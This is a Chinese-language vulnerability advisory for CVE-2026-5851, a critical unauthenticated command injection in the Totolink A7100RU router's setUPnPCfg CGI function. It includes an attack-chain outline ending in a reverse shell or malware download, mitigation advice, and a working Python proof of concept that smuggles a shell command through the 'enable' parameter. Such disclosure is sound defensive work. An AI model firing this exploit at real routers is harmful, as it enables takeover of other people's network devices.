CVE-2026-5851 CVSS 9.8 严重

CVE-2026-5851 Totolink A7100RU OS命令注入漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5851

漏洞类型

操作系统命令注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Totolink A7100RU

漏洞概述

Totolink A7100RU路由器在7.4cu.2313_b20191024版本中存在严重的操作系统命令注入漏洞。该漏洞源于/cgi-bin/cstecgi.cgi文件中的setUPnPCfg函数未对用户输入的enable参数进行有效过滤。攻击者无需身份认证即可通过网络向受影响设备发送特制的恶意数据包，从而在系统后台执行任意操作系统命令。由于攻击复杂度低且影响范围广，成功利用此漏洞可能导致攻击者完全接管设备，造成数据泄露、服务中断或僵尸网络化。鉴于目前已有公开的利用代码，用户需高度警惕。

技术细节

该漏洞的核心原理是典型的不安全参数拼接导致的命令注入。Totolink A7100RU设备的Web管理界面通过/cgi-bin/cstecgi.cgi处理各种配置请求。在调用setUPnPCfg功能时，程序直接提取HTTP请求中的enable参数值，并将其拼接到系统Shell命令中执行，而未经过任何消毒处理。攻击者可以利用Shell元字符（如分号、管道符或反引号）截断原有命令逻辑，并附加任意恶意的OS指令。由于CVSS向量显示无需用户交互（UI:N）且无需权限（PR:N），攻击者只需向目标IP发送特定格式的POST请求即可触发漏洞。在默认配置下，CGI进程通常以root权限运行，这意味着注入的命令将拥有最高系统权限，允许攻击者读取配置文件、修改网络设置或建立持久化后门。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别出运行Totolink A7100RU固件版本为7.4cu.2313_b20191024的目标设备IP。

STEP 2

2. 构造恶意请求

攻击者利用Python脚本或其他工具，构造包含恶意Shell命令的HTTP POST请求，目标URL为/cgi-bin/cstecgi.cgi，参数enable被注入命令拼接符。

STEP 3

3. 发送攻击载荷

将恶意请求发送至目标设备的Web服务端口（默认80或443）。

STEP 4

4. 命令执行

目标服务器后端CGI程序解析enable参数，未过滤直接执行系统命令，导致攻击者的恶意代码在设备上运行。

STEP 5

5. 获取控制权

攻击者利用执行的命令反弹Shell或下载恶意程序，从而完全控制路由器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    url = f"http://{target_ip}/cgi-bin/cstecgi.cgi"
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0"
    }
    # Payload to inject a command (e.g., create a file or ping)
    # Using ';' to separate commands
    payload = "; echo pwned > /tmp/poc.txt"
    data = {
        "topicurl": "setUPnPCfg",
        "enable": payload
    }
    
    try:
        r = requests.post(url, headers=headers, data=data, timeout=5)
        print(f"[*] Sent payload to {target_ip}")
        print(f"[*] Status: {r.status_code}")
        print(f"[*] Response: {r.text}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    exploit("192.168.1.1")

影响范围

Totolink A7100RU 7.4cu.2313_b20191024

防御指南

临时缓解措施

如果无法立即升级固件，请务必关闭路由器的远程管理功能（Remote Management/Web Access from WAN），并确保仅允许受信任的内网IP访问管理后台。同时，应监控网络流量中针对/cgi-bin/cstecgi.cgi路径的异常POST请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5851
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5851
3 Details https://www.cvedetails.com/cve/CVE-2026-5851/
4 VulDB https://vuldb.com/cve/CVE-2026-5851
5 Link https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_157/README.md
6 Link https://vuldb.com/submit/791271
7 Link https://vuldb.com/vuln/356377
8 Link https://vuldb.com/vuln/356377/cti
9 Link https://www.totolink.net/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表